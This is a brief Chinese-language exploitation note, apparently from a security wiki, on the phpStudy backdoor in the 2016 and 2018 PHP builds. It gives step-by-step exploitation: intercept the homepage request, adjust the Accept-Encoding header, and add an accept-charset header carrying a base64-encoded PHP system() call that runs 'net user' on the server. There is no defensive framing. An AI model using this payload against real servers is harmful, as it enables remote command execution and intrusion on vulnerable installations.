跳转至

漏洞版本

phpstudy后门

影响版本

phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45

利用

浏览主页抓包

去掉Accept-Encoding:gzip, defate逗号后面的空格去掉,否则命令执行会失败

在请求头添加 accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

密文内容为 echo system('net user');